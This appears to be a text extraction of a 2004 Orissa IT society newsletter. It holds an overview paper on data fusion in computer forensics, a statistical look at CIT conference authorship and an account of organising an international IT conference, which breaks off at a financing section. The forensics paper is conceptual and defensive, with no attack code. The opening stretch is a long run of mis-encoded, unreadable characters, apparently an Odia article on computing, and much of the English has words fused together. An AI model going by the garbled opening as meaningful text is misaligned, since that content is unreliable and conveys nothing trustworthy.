[`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 20: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

